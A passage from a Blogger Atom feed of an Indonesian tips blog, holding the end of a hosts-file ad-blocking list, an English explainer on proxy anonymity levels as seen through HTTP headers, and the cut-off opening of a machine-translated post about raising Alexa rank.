/&gt;127.0.0.1 musiccounter.ru&lt;br /&gt;127.0.0.1 myaffiliateprogram.com&lt;br /&gt;127.0.0.1 mystat.pl&lt;br /&gt;127.0.0.1 mytrix.com&lt;br /&gt;127.0.0.1 n69.com&lt;br /&gt;127.0.0.1 naj.sk&lt;br /&gt;127.0.0.1 navrcholu.cz&lt;br /&gt;127.0.0.1 nedstat.com&lt;br /&gt;127.0.0.1 nedstat.nl&lt;br /&gt;127.0.0.1 nedstatbasic.net&lt;br /&gt;127.0.0.1 netads.hotwired.com&lt;br /&gt;127.0.0.1 netads.sohu.com&lt;br /&gt;127.0.0.1 netdirect.nl&lt;br /&gt;127.0.0.1 netpool.netbookia.net&lt;br /&gt;127.0.0.1 netvertising.be&lt;br /&gt;127.0.0.1 network.realmedia.com&lt;br /&gt;127.0.0.1 new-ads.eurogamer.net&lt;br /&gt;127.0.0.1 newads.cmpnet.com&lt;br /&gt;127.0.0.1 newnet.qsrch.com&lt;br /&gt;127.0.0.1 newtopsites.com&lt;br /&gt;127.0.0.1 ng3.ads.warnerbros.com&lt;br /&gt;127.0.0.1 ngadcenter.net&lt;br /&gt;127.0.0.1 nitroclicks.com&lt;br /&gt;127.0.0.1 nsads.hotwired.com&lt;br /&gt;127.0.0.1 ntbanner.digitalriver.com&lt;br /&gt;127.0.0.1 oas-central.realmedia.com&lt;br /&gt;127.0.0.1 oas.benchmark.fr&lt;br /&gt;127.0.0.1 oas.foxnews.com&lt;br /&gt;127.0.0.1 oas.roanoke.com&lt;br /&gt;127.0.0.1 oas.salon.com&lt;br /&gt;127.0.0.1 oas.signonsandiego.com&lt;br /&gt;127.0.0.1 oas.toronto.com&lt;br /&gt;127.0.0.1 oas.uniontrib.com&lt;br /&gt;127.0.0.1 oas.villagevoice.com&lt;br /&gt;127.0.0.1 oascentral.chicagobusiness.com&lt;br /&gt;127.0.0.1 oascentral.redherring.com&lt;br /&gt;127.0.0.1 oascentral.theonion.com&lt;br /&gt;127.0.0.1 oascentral.thesmokinggun.com&lt;br /&gt;127.0.0.1 oasis.promon.cz&lt;br /&gt;127.0.0.1 observer.cz&lt;br /&gt;127.0.0.1 offeroptimizer.com&lt;br /&gt;127.0.0.1 oneandonlynetwork.com&lt;br /&gt;127.0.0.1 onestat.com&lt;br /&gt;127.0.0.1 onresponse.com&lt;br /&gt;127.0.0.1 openad.infobel.com&lt;br /&gt;127.0.0.1 openad.travelnow.com&lt;br /&gt;127.0.0.1 overpeer.com&lt;br /&gt;127.0.0.1 overpro.com&lt;br /&gt;127.0.0.1 overture.com&lt;br /&gt;127.0.0.1 oxcash.com&lt;br /&gt;127.0.0.1 p5.omaha.com&lt;br /&gt;127.0.0.1 partner-ads.com&lt;br /&gt;127.0.0.1 partner-source.com&lt;br /&gt;127.0.0.1 partner.gonamic.de&lt;br /&gt;127.0.0.1 partner.topcities.com&lt;br /&gt;127.0.0.1 partner2profit.com&lt;br /&gt;127.0.0.1 partnerkonto.de&lt;br /&gt;127.0.0.1 partners.priceline.com&lt;br /&gt;127.0.0.1 partners.starnetsystems.net&lt;br /&gt;127.0.0.1 paycounter.com&lt;br /&gt;127.0.0.1 paypopup.com&lt;br /&gt;127.0.0.1 payserve.com&lt;br /&gt;127.0.0.1 pbnet.ru&lt;br /&gt;127.0.0.1 pcwizz.com&lt;br /&gt;127.0.0.1 pennyweb.com&lt;br /&gt;127.0.0.1 phoenix-adrunner.mycomputer.com&lt;br /&gt;127.0.0.1 phpads.i-merge.net&lt;br /&gt;127.0.0.1 pillscash.com&lt;br /&gt;127.0.0.1 pimproll.com&lt;br /&gt;127.0.0.1 planetactive.com&lt;br /&gt;127.0.0.1 play4traffic.com&lt;br /&gt;127.0.0.1 pointroll.com&lt;br /&gt;127.0.0.1 pops.freeze.com&lt;br /&gt;127.0.0.1 popup.msn.com&lt;br /&gt;127.0.0.1 popupad.net&lt;br /&gt;127.0.0.1 popupmoney.com&lt;br /&gt;127.0.0.1 popupnation.com&lt;br /&gt;127.0.0.1 popups.infostart.com&lt;br /&gt;127.0.0.1 popupsponsor.com&lt;br /&gt;127.0.0.1 popuptraffic.com&lt;br /&gt;127.0.0.1 porntrack.com&lt;br /&gt;127.0.0.1 postmasterbannernet.com&lt;br /&gt;127.0.0.1 precisioncounter.com&lt;br /&gt;127.0.0.1 premium-offers.com&lt;br /&gt;127.0.0.1 premiumcash.de&lt;br /&gt;127.0.0.1 primaryads.com&lt;br /&gt;127.0.0.1 primetime.net&lt;br /&gt;127.0.0.1 pro-advertising.com&lt;br /&gt;127.0.0.1 profero.com&lt;br /&gt;127.0.0.1 professorbanner.com&lt;br /&gt;127.0.0.1 promote.pair.com&lt;br /&gt;127.0.0.1 promozia.de&lt;br /&gt;127.0.0.1 provexia.com&lt;br /&gt;127.0.0.1 psstt.com&lt;br /&gt;127.0.0.1 pub-g.ifrance.com&lt;br /&gt;127.0.0.1 pub.club-internet.fr&lt;br /&gt;127.0.0.1 pub.hardware.fr&lt;br /&gt;127.0.0.1 pub.realmedia.fr&lt;br /&gt;127.0.0.1 publi.grupocorreo.es&lt;br /&gt;127.0.0.1 publi1.grupocorreo.es&lt;br /&gt;127.0.0.1 publi2.grupocorreo.es&lt;br /&gt;127.0.0.1 publiads.com&lt;br /&gt;127.0.0.1 publicidad.elmundo.es&lt;br /&gt;127.0.0.1 publicidad.ya.com&lt;br /&gt;127.0.0.1 pubs.branchez-vous.com&lt;br /&gt;127.0.0.1 pubs.lemonde.fr&lt;br /&gt;127.0.0.1 q.azcentral.com&lt;br /&gt;127.0.0.1 qckjmp.com&lt;br /&gt;127.0.0.1 qksrv.net&lt;br /&gt;127.0.0.1 quarterserver.de&lt;br /&gt;127.0.0.1 questaffiliates.net&lt;br /&gt;127.0.0.1 quinst.com&lt;br /&gt;127.0.0.1 r.hotwired.com&lt;br /&gt;127.0.0.1 r.kde.cz&lt;br /&gt;127.0.0.1 rad.msn.com&lt;br /&gt;127.0.0.1 radiate.com&lt;br /&gt;127.0.0.1 rampidads.com&lt;br /&gt;127.0.0.1 ranking-charts.de&lt;br /&gt;127.0.0.1 ranking-hits.de&lt;br /&gt;127.0.0.1 rankyou.com&lt;br /&gt;127.0.0.1 rate.ru&lt;br /&gt;127.0.0.1 rb1.design.ru&lt;br /&gt;127.0.0.1 realads.realmedia.com&lt;br /&gt;127.0.0.1 realclix.com&lt;br /&gt;127.0.0.1 realmedia-a800.d4p.net&lt;br /&gt;127.0.0.1 realtechnetwork.com&lt;br /&gt;127.0.0.1 realtechnetwork.net&lt;br /&gt;127.0.0.1 realtracker.com&lt;br /&gt;127.0.0.1 redsherriff.com&lt;br /&gt;127.0.0.1 referralware.com&lt;br /&gt;127.0.0.1 regnow.com&lt;br /&gt;127.0.0.1 reklam.rfsl.se&lt;br /&gt;127.0.0.1 reklama.internet.cz&lt;br /&gt;127.0.0.1 reklama.reflektor.cz&lt;br /&gt;127.0.0.1 relmaxtop.com&lt;br /&gt;127.0.0.1 remotead.cnet.com&lt;br /&gt;127.0.0.1 reply.mediatris.net&lt;br /&gt;127.0.0.1 retaildirect.realmedia.com&lt;br /&gt;127.0.0.1 revenue.net&lt;br /&gt;127.0.0.1 rewardster.com&lt;br /&gt;127.0.0.1 richmails.com&lt;br /&gt;127.0.0.1 richwebmaster.com&lt;br /&gt;127.0.0.1 rightmedia.net&lt;br /&gt;127.0.0.1 rightstats.com&lt;br /&gt;127.0.0.1 rl.auto.ru&lt;br /&gt;127.0.0.1 rle.ru&lt;br /&gt;127.0.0.1 rmads.msn.com&lt;br /&gt;127.0.0.1 rmedia.boston.com&lt;br /&gt;127.0.0.1 rnd.yxo.ru&lt;br /&gt;127.0.0.1 roar.com&lt;br /&gt;127.0.0.1 roings.com&lt;br /&gt;127.0.0.1 roosevelt.gjbig.com&lt;br /&gt;127.0.0.1 rose.ixbt.com&lt;br /&gt;127.0.0.1 rotabanner.dni.ru&lt;br /&gt;127.0.0.1 rotabanner.izvestia.ru&lt;br /&gt;127.0.0.1 rotabanner.rian.ru&lt;br /&gt;127.0.0.1 rpts.net&lt;br /&gt;127.0.0.1 ru-traffic.com&lt;br /&gt;127.0.0.1 ru4.com&lt;br /&gt;127.0.0.1 safe-audit.com&lt;br /&gt;127.0.0.1 safelists.com&lt;br /&gt;127.0.0.1 sageanalyst.net&lt;br /&gt;127.0.0.1 searchlocate.com&lt;br /&gt;127.0.0.1 searchramp.com&lt;br /&gt;127.0.0.1 secure.webconnect.net&lt;br /&gt;127.0.0.1 seeq.com&lt;br /&gt;127.0.0.1 seo4india.com&lt;br /&gt;127.0.0.1 separtnership.com&lt;br /&gt;127.0.0.1 serv0.com&lt;br /&gt;127.0.0.1 servads.aip.org&lt;br /&gt;127.0.0.1 servedby.netshelter.net&lt;br /&gt;127.0.0.1 servethis.com&lt;br /&gt;127.0.0.1 serving-sys.com&lt;br /&gt;127.0.0.1 sexcounter.com&lt;br /&gt;127.0.0.1 sexlist.com&lt;br /&gt;127.0.0.1 sextracker.com&lt;br /&gt;127.0.0.1 sfads.osdn.com&lt;br /&gt;127.0.0.1 shareasale.com&lt;br /&gt;127.0.0.1 sher.index.hu&lt;br /&gt;127.0.0.1 shinystat.it&lt;br /&gt;127.0.0.1 siccash.com&lt;br /&gt;127.0.0.1 sidebar.angelfire.com&lt;br /&gt;127.0.0.1 sitemeter.com&lt;br /&gt;127.0.0.1 sma.punto.net&lt;br /&gt;127.0.0.1 smartadserver.com&lt;br /&gt;127.0.0.1 smartclicks.net&lt;br /&gt;127.0.0.1 smartdirect.com&lt;br /&gt;127.0.0.1 smfgroup.cjb.net&lt;br /&gt;127.0.0.1 smile.modchipstore.com&lt;br /&gt;127.0.0.1 sn.baventures.com&lt;br /&gt;127.0.0.1 softclick.com.br&lt;br /&gt;127.0.0.1 software.global-netcom.de&lt;br /&gt;127.0.0.1 softwaresponsor.com&lt;br /&gt;127.0.0.1 specificclick.com&lt;br /&gt;127.0.0.1 specificpop.com&lt;br /&gt;127.0.0.1 spezialreporte.de&lt;br /&gt;127.0.0.1 spinbox.maccentral.com&lt;br /&gt;127.0.0.1 spinbox.net&lt;br /&gt;127.0.0.1 spinbox.techtracker.com&lt;br /&gt;127.0.0.1 spinbox.versiontracker.com&lt;br /&gt;127.0.0.1 sponsor4you.net&lt;br /&gt;127.0.0.1 sponsoradulto.com&lt;br /&gt;127.0.0.1 sponsorpro.de&lt;br /&gt;127.0.0.1 sponsors.thoughtsmedia.com&lt;br /&gt;127.0.0.1 sprinks-clicks.about.com&lt;br /&gt;127.0.0.1 spylog.com&lt;br /&gt;127.0.0.1 spywarelabs.com&lt;br /&gt;127.0.0.1 spywarenuker.com&lt;br /&gt;127.0.0.1 ssads.osdn.com&lt;br /&gt;127.0.0.1 starffa.com&lt;br /&gt;127.0.0.1 start.freeze.com&lt;br /&gt;127.0.0.1 stat.dealtime.com&lt;br /&gt;127.0.0.1 stat.doxod.net&lt;br /&gt;127.0.0.1 stat.pl&lt;br /&gt;127.0.0.1 stat.webmedia.pl&lt;br /&gt;127.0.0.1 stat.zenon.net&lt;br /&gt;127.0.0.1 statcounter.com&lt;br /&gt;127.0.0.1 static.itrack.it&lt;br /&gt;127.0.0.1 static.smni.com&lt;br /&gt;127.0.0.1 staticads.btopenworld.com&lt;br /&gt;127.0.0.1 stats.blogger.com&lt;br /&gt;127.0.0.1 stats.cts-bv.nl&lt;br /&gt;127.0.0.1 stats.darkbluesea.com&lt;br /&gt;127.0.0.1 stats.klsoft.com&lt;br /&gt;127.0.0.1 stats4all.com&lt;br /&gt;127.0.0.1 stop-popup-ads-now.com&lt;br /&gt;127.0.0.1 sugoicounter.com&lt;br /&gt;127.0.0.1 superclix.de&lt;br /&gt;127.0.0.1 superstats.com&lt;br /&gt;127.0.0.1 supertop.ru&lt;br /&gt;127.0.0.1 supertop100.com&lt;br /&gt;127.0.0.1 synergiinteractive.com&lt;br /&gt;127.0.0.1 targad.de&lt;br /&gt;127.0.0.1 targetnet.com&lt;br /&gt;127.0.0.1 targetpoint.com&lt;br /&gt;127.0.0.1 targetsaver.com&lt;br /&gt;127.0.0.1 targetshop.com&lt;br /&gt;127.0.0.1 teknosurf2.com&lt;br /&gt;127.0.0.1 teknosurf3.com&lt;br /&gt;127.0.0.1 test.com&lt;br /&gt;127.0.0.1 textads.biz&lt;br /&gt;127.0.0.1 textads.opera.com&lt;br /&gt;127.0.0.1 textlinks.com&lt;br /&gt;127.0.0.1 tfag.de&lt;br /&gt;127.0.0.1 the-counter.net&lt;br /&gt;127.0.0.1 theanswerto.com&lt;br /&gt;127.0.0.1 thebannerguru.com&lt;br /&gt;127.0.0.1 thecounter.com&lt;br /&gt;127.0.0.1 thevictorynetwork.com&lt;br /&gt;127.0.0.1 thinkingmedia.net&lt;br /&gt;127.0.0.1 thisbanner.com&lt;br /&gt;127.0.0.1 thruport.com&lt;br /&gt;127.0.0.1 tier1network.com&lt;br /&gt;127.0.0.1 tinybar.com&lt;br /&gt;127.0.0.1 tmsads.tribune.com&lt;br /&gt;127.0.0.1 toads.osdn.com&lt;br /&gt;127.0.0.1 toolbar.netscape.com&lt;br /&gt;127.0.0.1 top.list.ru&lt;br /&gt;127.0.0.1 top.one.ru&lt;br /&gt;127.0.0.1 top.proext.com&lt;br /&gt;127.0.0.1 top100-images.rambler.ru&lt;br /&gt;127.0.0.1 top100.mafia.ru&lt;br /&gt;127.0.0.1 top20.com&lt;br /&gt;127.0.0.1 topbarh.box.sk&lt;br /&gt;127.0.0.1 toplist.cz&lt;br /&gt;127.0.0.1 toplista.mw.hu&lt;br /&gt;127.0.0.1 topping.com.ua&lt;br /&gt;127.0.0.1 topprofits.info&lt;br /&gt;127.0.0.1 toprebates.com&lt;br /&gt;127.0.0.1 topsearcher.com&lt;br /&gt;127.0.0.1 topshop-counter.rambler.ru&lt;br /&gt;127.0.0.1 topstats.com&lt;br /&gt;127.0.0.1 topstats.net&lt;br /&gt;127.0.0.1 tps108.org&lt;br /&gt;127.0.0.1 track.freexxxhost.net&lt;br /&gt;127.0.0.1 tracking.frantic.com&lt;br /&gt;127.0.0.1 tracking101.com&lt;br /&gt;127.0.0.1 trackmysales.com&lt;br /&gt;127.0.0.1 tradedoubler.com&lt;br /&gt;127.0.0.1 traffic-exchange.com&lt;br /&gt;127.0.0.1 trafficdiscount.com&lt;br /&gt;127.0.0.1 trafficmp.com&lt;br /&gt;127.0.0.1 trafficswarm.com&lt;br /&gt;127.0.0.1 trafficsyndicate.com&lt;br /&gt;127.0.0.1 traffictrader.net&lt;br /&gt;127.0.0.1 trafficvenue.net&lt;br /&gt;127.0.0.1 trafic.ro&lt;br /&gt;127.0.0.1 traficdublu.ro&lt;br /&gt;127.0.0.1 trafix.sk&lt;br /&gt;127.0.0.1 trakkerd.net&lt;br /&gt;127.0.0.1 trekblue.com&lt;br /&gt;127.0.0.1 trekdata.com&lt;br /&gt;127.0.0.1 tribalfusion.com&lt;br /&gt;127.0.0.1 trix.net&lt;br /&gt;127.0.0.1 truehits.net&lt;br /&gt;127.0.0.1 truehits1.gits.net.th&lt;br /&gt;127.0.0.1 truehits2.gits.net.th&lt;br /&gt;127.0.0.1 tsms-ad.tsms.com&lt;br /&gt;127.0.0.1 ukaffiliates2.com&lt;br /&gt;127.0.0.1 ukbanners.com&lt;br /&gt;127.0.0.1 ultimatecounter.com&lt;br /&gt;127.0.0.1 updated.com&lt;br /&gt;127.0.0.1 us.a1.yimg.com&lt;br /&gt;127.0.0.1 usapromotravel.com&lt;br /&gt;127.0.0.1 usmsad.tom.com&lt;br /&gt;127.0.0.1 utarget.co.uk&lt;br /&gt;127.0.0.1 utils.mediageneral.net&lt;br /&gt;127.0.0.1 valuead.com&lt;br /&gt;127.0.0.1 valueclick.com&lt;br /&gt;127.0.0.1 valueclick.net&lt;br /&gt;127.0.0.1 valuecommerce.com&lt;br /&gt;127.0.0.1 valuesponsor.com&lt;br /&gt;127.0.0.1 vendaregroup.com&lt;br /&gt;127.0.0.1 vericlick.com&lt;br /&gt;127.0.0.1 vg.ad.asap-asp.net&lt;br /&gt;127.0.0.1 vibrantmedia.com&lt;br /&gt;127.0.0.1 view4cash.de&lt;br /&gt;127.0.0.1 viewpoint.com&lt;br /&gt;127.0.0.1 vortextraffic.com&lt;br /&gt;127.0.0.1 vx2.cc&lt;br /&gt;127.0.0.1 w3exit.com&lt;br /&gt;127.0.0.1 wannaclick.com&lt;br /&gt;127.0.0.1 web-stat.com&lt;br /&gt;127.0.0.1 web2.deja.com&lt;br /&gt;127.0.0.1 webads.bizservers.com&lt;br /&gt;127.0.0.1 webads.co.nz&lt;br /&gt;127.0.0.1 webads.nl&lt;br /&gt;127.0.0.1 webangel.ru&lt;br /&gt;127.0.0.1 webcash.nl&lt;br /&gt;127.0.0.1 webcounter.cz&lt;br /&gt;127.0.0.1 webcounter.goweb.de&lt;br /&gt;127.0.0.1 webmasterplan.com&lt;br /&gt;127.0.0.1 webpdp.gator.com&lt;br /&gt;127.0.0.1 webpower.com&lt;br /&gt;127.0.0.1 websitefreepromotions.com&lt;br /&gt;127.0.0.1 websponsors.com&lt;br /&gt;127.0.0.1 webstars2000.com&lt;br /&gt;127.0.0.1 webstat.com&lt;br /&gt;127.0.0.1 webstat.net&lt;br /&gt;127.0.0.1 webtraxx.de&lt;br /&gt;127.0.0.1 webtrendslive.com&lt;br /&gt;127.0.0.1 wegcash.com&lt;br /&gt;127.0.0.1 wenksdisdkjeilsow.com&lt;br /&gt;127.0.0.1 whenu.com&lt;br /&gt;127.0.0.1 whispa.com&lt;br /&gt;127.0.0.1 window.nixnet.cz&lt;br /&gt;127.0.0.1 windupdates.com&lt;br /&gt;127.0.0.1 wipub.com&lt;br /&gt;127.0.0.1 worldbe.com&lt;br /&gt;127.0.0.1 wtlive.com&lt;br /&gt;127.0.0.1 wustat.windows.com&lt;br /&gt;127.0.0.1 www-banner.chat.ru&lt;br /&gt;127.0.0.1 www.adsxchange.lv&lt;br /&gt;127.0.0.1 www.banner-link.com.br&lt;br /&gt;127.0.0.1 www.dnps.com&lt;br /&gt;127.0.0.1 www.kaplanindex.com&lt;br /&gt;127.0.0.1 www.money4exit.de&lt;br /&gt;127.0.0.1 www.photo-ads.co.uk&lt;br /&gt;127.0.0.1 www.sponsor2002.de&lt;br /&gt;127.0.0.1 x.mycity.com&lt;br /&gt;127.0.0.1 xchange.ro&lt;br /&gt;127.0.0.1 xiti.com&lt;br /&gt;127.0.0.1 xq1.net&lt;br /&gt;127.0.0.1 xtrocash.org&lt;br /&gt;127.0.0.1 xxxcounter.com&lt;br /&gt;127.0.0.1 xxxtoolbar.com&lt;br /&gt;127.0.0.1 xzoomy.com&lt;br /&gt;127.0.0.1 y.ibsys.com&lt;br /&gt;127.0.0.1 yesadvertising.com&lt;br /&gt;127.0.0.1 youclick2earn.com&lt;br /&gt;127.0.0.1 z.times.lv&lt;br /&gt;127.0.0.1 zanox-affiliate.de&lt;br /&gt;127.0.0.1 zanox.com&lt;br /&gt;127.0.0.1 zeads.com&lt;br /&gt;127.0.0.1 zedo.com&lt;br /&gt;127.0.0.1 zencudo.co.uk&lt;br /&gt;127.0.0.1 zi.r.tv.com&lt;br /&gt;127.0.0.1 zmedia.comme&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-6906053030383302613?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/6906053030383302613/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/memproteksi-jaringan.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6906053030383302613'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/6906053030383302613'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/memproteksi-jaringan.html' title='memproteksi Jaringan'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1575973990788586301</id><published>2010-12-28T02:17:00.000-08:00</published><updated>2010-12-28T02:20:09.316-08:00</updated><title type='text'>membuat all semua proxy</title><content type='html'>The exchange of information in Internet is made by the "client - server" model. A client sends a request (what files he needs) and a server sends a reply (required files). For close cooperation (full understanding) between a client and a server the client sends additional information about itself: a version and a name of an operating system, configuration of a browser (including its name and version) etc. This information can be necessary for the server in order to know which web-page should be given (open) to the client. There are different variants of web-pages for different configurations of browsers. However, as long as web-pages do not usually depend on browsers, it makes sense to hide this information from the web-server.&lt;br /&gt;&lt;br /&gt;What your browser transmits to a web-server:&lt;br /&gt;a name and a version of an operating system&lt;br /&gt;a name and a version of a browser&lt;br /&gt;configuration of a browser (display resolution, color depth, java / javascript support, ...)&lt;br /&gt;IP-address of a client&lt;br /&gt;Other information&lt;br /&gt;&lt;br /&gt;The most important part of such information (and absolutely needless for a web-server) is information about IP-address. Using your IP it is possible to know about you the following:&lt;br /&gt;a country where you are from&lt;br /&gt;a city&lt;br /&gt;your provider?s name and e-mail&lt;br /&gt;your physical address&lt;br /&gt;&lt;br /&gt;Information, transmitted by a client to a server is available (accessible) for a server as environment variables. Every information unit is a value of some variable. If any information unit is not transmitted, then corresponding variable will be empty (its value will be undetermined).&lt;br /&gt;&lt;br /&gt;These are some environment variables:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR ? IP address of a client&lt;br /&gt;&lt;br /&gt;HTTP_VIA ? if it is not empty, then a proxy is used. Value is an address (or several addresses) of a proxy server, this variable is added by a proxy server itself if you use one.&lt;br /&gt;&lt;br /&gt;HTTP_X_FORWARDED_FOR ? if it is not empty, then a proxy is used. Value is a real IP address of a client (your IP), this variable is also added by a proxy server if you use one.&lt;br /&gt;&lt;br /&gt;HTTP_ACCEPT_LANGUAGE ? what language is used in browser (what language a page should be displayed in)&lt;br /&gt;&lt;br /&gt;HTTP_USER_AGENT ? so called "a user?s agent". For all browsers this is Mozilla. Furthermore, browser?s name and version (e.g. MSIE 5.5) and an operating system (e.g. Windows 98) is also mentioned here.&lt;br /&gt;&lt;br /&gt;HTTP_HOST ? is a web server?s name&lt;br /&gt;&lt;br /&gt;This is a small part of environment variables. In fact there are much more of them (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). Their quantity can depend on settings of both a server and a client.&lt;br /&gt;&lt;br /&gt;These are examples of variable values:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR = 194.85.1.1&lt;br /&gt;HTTP_ACCEPT_LANGUAGE = ru&lt;br /&gt;HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)&lt;br /&gt;HTTP_HOST = www.webserver.ru&lt;br /&gt;HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)&lt;br /&gt;HTTP_X_FORWARDED_FOR = 194.115.5.5&lt;br /&gt;&lt;br /&gt;Anonymity at work in Internet is determined by what environment variables "hide" from a web-server.&lt;br /&gt;&lt;br /&gt;If a proxy server is not used, then environment variables look in the following way:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR = your IP&lt;br /&gt;HTTP_VIA = not determined&lt;br /&gt;HTTP_X_FORWARDED_FOR = not determined&lt;br /&gt;&lt;br /&gt;According to how environment variables "hided" by proxy servers, there are several types of proxies&lt;br /&gt;Transparent Proxies&lt;br /&gt;&lt;br /&gt;They do not hide information about your IP address:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR = proxy IP&lt;br /&gt;HTTP_VIA = proxy IP&lt;br /&gt;HTTP_X_FORWARDED_FOR = your IP&lt;br /&gt;&lt;br /&gt;The function of such proxy servers is not the improvement of your anonymity in Internet. Their purpose is information cashing, organization of joint access to Internet of several computers, etc.&lt;br /&gt;Anonymous Proxies&lt;br /&gt;&lt;br /&gt;All proxy servers, that hide a client?s IP address in any way are called anonymous proxies&lt;br /&gt;&lt;br /&gt;Simple Anonymous Proxies&lt;br /&gt;&lt;br /&gt;These proxy servers do not hide a fact that a proxy is used, however they replace your IP with its own:&lt;br /&gt;REMOTE_ADDR = proxy IP&lt;br /&gt;HTTP_VIA = proxy IP&lt;br /&gt;HTTP_X_FORWARDED_FOR = proxy IP&lt;br /&gt;&lt;br /&gt;These proxies are the most widespread among other anonymous proxy servers.&lt;br /&gt;&lt;br /&gt;Distorting Proxies&lt;br /&gt;&lt;br /&gt;As well as simple anonymous proxy servers these proxies do not hide the fact that a proxy server is used. However a client?s IP address (your IP address) is replaced with another (arbitrary, random) IP:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR = proxy IP&lt;br /&gt;HTTP_VIA = proxy IP&lt;br /&gt;HTTP_X_FORWARDED_FOR = random IP address&lt;br /&gt;High Anonymity Proxies&lt;br /&gt;&lt;br /&gt;These proxy servers are also called "high anonymity proxy". In contrast to other types of anonymity proxy servers they hide a fact of using a proxy:&lt;br /&gt;&lt;br /&gt;REMOTE_ADDR = proxy IP&lt;br /&gt;HTTP_VIA = not determined&lt;br /&gt;HTTP_X_FORWARDED_FOR = not determined&lt;br /&gt;&lt;br /&gt;That means that values of variables are the same as if proxy is not used, with the exception of one very important thing ? proxy IP is used instead of your IP address.&lt;br /&gt;Summary&lt;br /&gt;&lt;br /&gt;Depending on purposes there are transparent and anonymity proxies. However, remember, using proxy servers you hide only your IP from a web-server, but other information (about browser configuration) is accessible!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5397170308485192825-1575973990788586301?l=1000trik.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://1000trik.blogspot.com/feeds/1575973990788586301/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://1000trik.blogspot.com/2010/12/membuat-all-semua-proxy.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1575973990788586301'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5397170308485192825/posts/default/1575973990788586301'/><link rel='alternate' type='text/html' href='http://1000trik.blogspot.com/2010/12/membuat-all-semua-proxy.html' title='membuat all semua proxy'/><author><name>Sharingan</name><uri>http://www.blogger.com/profile/16643257758648725506</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5397170308485192825.post-1623772732806631018</id><published>2010-12-26T23:34:00.000-08:00</published><updated>2010-12-26T23:44:45.881-08:00</updated><title type='text'>mengingkatkan Rank Alexa</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_F4BxDcSkH4w/TPzQ4mRj-EI/AAAAAAAAAZc/h0ZD2Xbh4QE/s1600/alexa+rank.jpg"&gt;&lt;img style="float: left; margin: 0pt 10px 10px 0pt; cursor: pointer; width: 453px; height: 269px;" src="http://3.bp.blogspot.com/_F4BxDcSkH4w/TPzQ4mRj-EI/AAAAAAAAAZc/h0ZD2Xbh4QE/s1600/alexa+rank.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span id="result_box" class="long_text" lang="en"&gt;&lt;span style="" title=""&gt;This article is another version of my article about the day  after Kick Powerful Boost Alexa. &lt;/span&gt;&lt;span style="" title=""&gt;the  previous trick is basic - the basis of alexa trick that has been  mushrooming among bloggers. &lt;/span&gt;&lt;span style="" title=""&gt;This time is  additional and conclusions of tricks - tricks alexa rank that I have  written them. &lt;/span&gt;&lt;span style="" title=""&gt;Where there will be  additional on how to increase alexa rank of your blog. &lt;/span&gt;&lt;span title=""&gt;Whether it's with backling and others - others. &lt;/span&gt;&lt;span style="" title=""&gt;In article writing tricks to increase alexa rank with  this fast, I did not intentionally Extend. &lt;/span&gt;&lt;span style="" title=""&gt;If you do not understand, please read in my previous article. &lt;/span&gt;&lt;span style="" title=""&gt;In writing this article, I attended helped by the  blog dekrizky. &lt;/span&gt;&lt;span style="" title=""&gt;Immediately, please read  this powerful tricks Alexa rank. &lt;/span&gt;&lt;span title=""&gt;hehehe ..&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="" title=""&gt;Alexa is a site that provides rankings that have been  recognized as a consideration in the cyber world, whether for a paid  review or other. &lt;/span&gt;&lt;span style="" title=""&gt;And assessment is  through the number of visitors and popularity. &lt;/span&gt;&lt;span title=""&gt;Why  do I mention two items between visitors and its popularity? &lt;/span&gt;&lt;span style="" title=""&gt;Because a lot of reality to say more than 100  visitors per day even better than his Alexa rank is 1000 per day. &lt;/span&gt;&lt;span title=""&gt;Some say also depends on the number of IP (Internet Protocol)  of different visitors, hosting and so forth. &lt;/span&gt;&lt;span title=""&gt;Therefore  many people are looking for ways to increase alexa rank trick along  with page rank. &lt;/span&gt;&lt;span title=""&gt;Especially for bloggers who like  to play a paid review or Selling links. &lt;/span&gt;&lt;span title=""&gt;Where  pagerank and alexa rank is the main calculations.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span title=""&gt;There are various ways to increase your alexa rank. &lt;/span&gt;&lt;span title=""&gt;As in the previous article. &lt;/span&gt;&lt;span title=""&gt;Among 